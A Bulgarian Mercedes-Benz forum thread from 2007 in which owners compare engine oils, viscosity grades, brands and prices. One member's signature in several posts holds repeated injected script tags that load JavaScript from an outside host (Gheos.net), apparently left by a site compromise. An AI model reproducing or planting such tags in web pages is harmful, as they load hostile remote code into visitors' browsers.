да се похвалясмених маслото и стана АД
Started by Lorinser, 16 Apr 2007 - 17:13:22
69 replies to this topic
#31
Posted 23 April 2007 - 17:07
ми кво да кажа - ти си от късметлиите дето имат чичовци в Европата. Кво да кажа аз като моя чичо живее на село
. И все пак тва черното на кастрол полусинтетика 10/40 ли беше , че нещо ми бяга?
W201 M102.962 <script
<script SRC="http://Gheos.net/js/...2.js"></SCRIPT>
SRC="http://Gheos.net/js/...2.js"></SCRIPT>
<script SRC="http://Gheos.net/js/...2.js"></SCRIPT>
SRC="http://Gheos.net/js/...2.js"></SCRIPT>
#32
Posted 23 April 2007 - 19:13
След доста обикаляне,запитвания,допитвания,почесвания там,където не ме сърби се реших и купих от Практикер 3 туби по 5 литра масло Мобил X/кво ли ще да е тва...?/вносител Ото-Топ,според лазерния печат е произведено във Франция септември 2006год, 5W/40 синтетично,ама 100% ли не разбрах,че не си бях взел очилата!
Хареса ми цената-69лв. за 5 литра и спецификацията по МВ-229.3 !Така,че добро-лошо вече го платих и съм любопитен някойако знае нещо за тва масло да каже!
#33
Posted 23 April 2007 - 21:48
За информация на заинтересованите-Mobil Synt S 5w-40,опаковано в 5л.туби под името Mobil Special X и на по-тънка цена....
Още инфо:
http://www.motor-tal...904#post8348904
http://www.csmarketi.....20X 5W-40.doc
http://www.mobil.com...ynt_S_5W-40.asp
Съществува като одобрен продукт в имениците на БМВ,Мерцедес,VW/Audi...
МБ 229.3
Хидрокрекингована суперочистена минерална база,без SuperSyn технология(затуй цената)...прочее,някои фирми не биха се посвенили да изпишат "synthetic" на етикета...
Още инфо:
http://www.motor-tal...904#post8348904
http://www.csmarketi.....20X 5W-40.doc
http://www.mobil.com...ynt_S_5W-40.asp
Съществува като одобрен продукт в имениците на БМВ,Мерцедес,VW/Audi...
МБ 229.3
Хидрокрекингована суперочистена минерална база,без SuperSyn технология(затуй цената)...прочее,някои фирми не биха се посвенили да изпишат "synthetic" на етикета...
Blood, Sweat and Diesel !
#34
Posted 24 April 2007 - 07:25
имам тук във Варна един агент, дето внася масла немски - идват направо с кашони от рафинерията в Германия, неразопаковани..... Същата рафинерия, която прави масла за Лемфьодер (те са ги опаковат само).... Понеже българската фирма има клонове в цялата страна и доста голямо потребление - изхитрили са се и прескочили лемфьодер и пазаруват директно от рафинерията (моят човек даже скоро ходи до Германия в тая рафинерия), с някакво немско име са маслата - непроизносимо някакво, трябва си го препиша на лист и да ви го напиша.... Та става въпрос за отлично немско масло, доколкото разбрах всички мерседеси от таксиметровия парк във Варна карат с него... Цената е изключително добра. Ако е за клуба - може да стане и по добра. Ако има интерес ще преговарям... Още повече, че фирмата има магазини из цяла България.... Искам обаче първо аз да сложа на моя мерс, да видя как ще се държи, за да препоръчам и на вас, вече от личен опит.... Но съм предварително с мнооого големи очаквания, защото маслото изглежда хубаво, а и човекът за когото стана въпрос в началото ми е личен приятел и не би ме подвел....
#35
Posted 25 April 2007 - 21:44
от няколко дена проучвам в нета маслата на приста. на другата смяна ще взема да си прежаля колицата и да и прасна една полусинтетика 10W40. пък и цената е доста примамлива - около 7лв на литър. досега карах само с минерално 15W40 на мобил , ама последния път нещо не ми хареса . незнам дали маслото е виновно но зимата в наи-студените дни / доколкото ги имаше/ чат пат ми тракаха повдигачите. забелязахте ли как се вдигнаха цените на маслата ? що така бе?
W201 M102.962 <script
<script SRC="http://Gheos.net/js/...2.js"></SCRIPT>
SRC="http://Gheos.net/js/...2.js"></SCRIPT>
<script SRC="http://Gheos.net/js/...2.js"></SCRIPT>
SRC="http://Gheos.net/js/...2.js"></SCRIPT>
#36
Posted 26 April 2007 - 08:04
щото Евросъюз майка, затова
а и тая твоя идея с Приста.. как ще сложиш това в Мерцедес??!!? никогаж...
а и тая твоя идея с Приста.. как ще сложиш това в Мерцедес??!!? никогаж...
#37
Posted 26 April 2007 - 12:08
щото Евросъюз майка, затова
![]()
а и тая твоя идея с Приста.. как ще сложиш това в Мерцедес??!!? никогаж...
и ти си прав , ама досега никой не е ревал от техни продукти. то вярно , че в нашия форум тази марка не е на почит , но от друга страна съм доволен от АТФ-а им и спирачната течност . засега просто събирам мнения
W201 M102.962 <script
<script SRC="http://Gheos.net/js/...2.js"></SCRIPT>
SRC="http://Gheos.net/js/...2.js"></SCRIPT>
<script SRC="http://Gheos.net/js/...2.js"></SCRIPT>
SRC="http://Gheos.net/js/...2.js"></SCRIPT>
#38
Posted 26 April 2007 - 19:38
щото Евросъюз майка, затова
![]()
а и тая твоя идея с Приста.. как ще сложиш това в Мерцедес??!!? никогаж...
Колега, ако нямаш лични впечатления по добре не коментирай.
Аз съм ползвал Приста 5W-40 и съм доволен, точно толкова, колкото и от фффносно масло с подобни показатели, само дето нащо си е на по-ниска цена. Аз лично не знам за кола, която да е карана с приста и да се е прецакала- мой роднина караше преди време един Опел и му наливаше само минерална Приста- тази кола се караше на максимална ръчка и не даваше никакви проблеми с мотора, продаде я на някакъв човек в Пещера и оня още си кара и си свирка.
Като има щури хора да броят по 10 и повече кинта за минералки на кастрол и мобил, това си е техен проблем.
Колегата W123 кара неговия бенц със полусинтетика на приста и даже май е доволен, преди това си сипа в автомата пак приста и пак остана доволен.
Lancia Kappa TDS / Land-Rover 88 Series 3 FFR
#39
Posted 26 April 2007 - 20:23
абе аз на автомата не смея , ама на хидравликата на волана сложих АТФ на приста и не се оплаквам. имах бус който карах само с тяхното минерално 15W40 и не съм имал грижи. купих го чисто нов и го продадох на 115 000 , като съм му сменял масло точно 15 пъти. вярно беше Газела 2.5 л. двг от волга, които е много по прост двигател от чисто технологична гледна точка спрямо мерцедесовия , но в крайна сметка маслото изпълнява една и съща функция и при двата. не хваля нито газелите нито пристата , просто казвам , чи не съм се наигравал с ментета
W201 M102.962 <script
<script SRC="http://Gheos.net/js/...2.js"></SCRIPT>
SRC="http://Gheos.net/js/...2.js"></SCRIPT>
<script SRC="http://Gheos.net/js/...2.js"></SCRIPT>
SRC="http://Gheos.net/js/...2.js"></SCRIPT>
#40
Posted 20 June 2007 - 21:35
СМЕНИХ ПОВДИГАЧИТЕ!!!!, налях масло от великата Германия и тракането престана! Е, ти нищо не каза с това!
#41
Posted 20 June 2007 - 22:15
Здравейте колеги,
Предишното масло, с което карах 190Е беше ЕЛФ 15W40, имаше проблеми при загрял двигател налягането стигаше до 0,2-0,3 атмосфери.
След смяна на маслото с Катрол 15W50, вече този проблем изчезна и за сега нямам оплаквания. От време на време се чува някакво тракане на свободна скорост, но аз си го обяснявам в разхлабена част някъде по ходовата част...
Просто исках да споделя. Маслото Кастрол го купих някъде от района на гарата във Варна и за сега съм доволен.
Поздрави,
-Николай Кичуков
Предишното масло, с което карах 190Е беше ЕЛФ 15W40, имаше проблеми при загрял двигател налягането стигаше до 0,2-0,3 атмосфери.
След смяна на маслото с Катрол 15W50, вече този проблем изчезна и за сега нямам оплаквания. От време на време се чува някакво тракане на свободна скорост, но аз си го обяснявам в разхлабена част някъде по ходовата част...
Просто исках да споделя. Маслото Кастрол го купих някъде от района на гарата във Варна и за сега съм доволен.
Поздрави,
-Николай Кичуков
#42
Posted 21 June 2007 - 21:11
Малко със закъснение ама...
а и тая твоя идея с Приста.. как ще сложиш това в Мерцедес??!!? никогаж...
Колегата W123 кара неговия бенц със полусинтетика на приста и даже май е доволен, преди това си сипа в автомата пак приста и пак остана доволен.
Значи някъде мнооооого назад ми е темата за Пристата,моторното им масло и това за автомата.Без да звучи като реклама,но повече не ме тормози въпроса какво масло да наливам.Сега сипах и на спирачките ДОТ4,и остава на диф-а и хидравликата да сменя.Познай каква марка че бъдат.Това е може би единствения път когато съм доволен от нещо българско и ще продължавам да го ползвам.абе аз на автомата не смея , ама на хидравликата на волана сложих АТФ на приста и не се оплаквам
#43
Posted 22 June 2007 - 08:08
Аз пък да ви кажа мисля да слагам на МВ-ца Тексако ама не какво да е.
Става на въпрос за полусинтетиката която се слага на комбайните нюхоланд.
Не вярвам да се излагат с качеството защото една такава машина струва 1-2 милиона и ако маслото сгафи тежко на вносителя.
Имам приятел който работи там и качеството е гарантирано.
Той си сложи на МВ-ца и сега мърка като котенце./голям кеф/
Става на въпрос за полусинтетиката която се слага на комбайните нюхоланд.
Не вярвам да се излагат с качеството защото една такава машина струва 1-2 милиона и ако маслото сгафи тежко на вносителя.
Имам приятел който работи там и качеството е гарантирано.
Той си сложи на МВ-ца и сега мърка като котенце./голям кеф/
Само вселената и човешката глупост могат да бъдат безкрайни.
#44
Posted 22 June 2007 - 17:35
Аз пък да ви кажа мисля да слагам на МВ-ца Тексако ама не какво да е.
Става на въпрос за полусинтетиката която се слага на комбайните нюхоланд.
Не вярвам да се излагат с качеството защото една такава машина струва 1-2 милиона и ако маслото сгафи тежко на вносителя.
Имам приятел който работи там и качеството е гарантирано.
Той си сложи на МВ-ца и сега мърка като котенце./голям кеф/
Само дето комбайните обикновено се палят за събирането на реколтата и се гасят, като я съберат. Т.е. може да са и с някакво моногрейд масло SAE50, дето като загрее да е супер, ама на студено да е като дзифт.
Mercedes-Benz - защото животът е твърде кратък.
'91 S124 300 TD Turbodiesel OM603
'91 S124 300 TD Turbodiesel OM603
#45
Posted 22 June 2007 - 21:04
Само дето комбайните обикновено се палят за събирането на реколтата и се гасят, като я съберат. Т.е. може да са и с някакво моногрейд масло SAE50, дето като загрее да е супер, ама на студено да е като дзифт.
По принцип си прав но ми позволи да не се съглася с тебе в този случай.
Лично съм взимал проби и съм ги тествал /до колкото ми позволяват домашните условия/
Вискозитета и мазилните свойства се запазват на 95% в доста широк температурен диапазон.
Все пак не става въпрос само за комбайни, пък и те не са нито НИВА нито CLAAS.
Маслото отговаря на спецификация 10W40 реално.
Само вселената и човешката глупост могат да бъдат безкрайни.
1 user(s) are reading this topic
0 members, 1 guests, 0 anonymous users















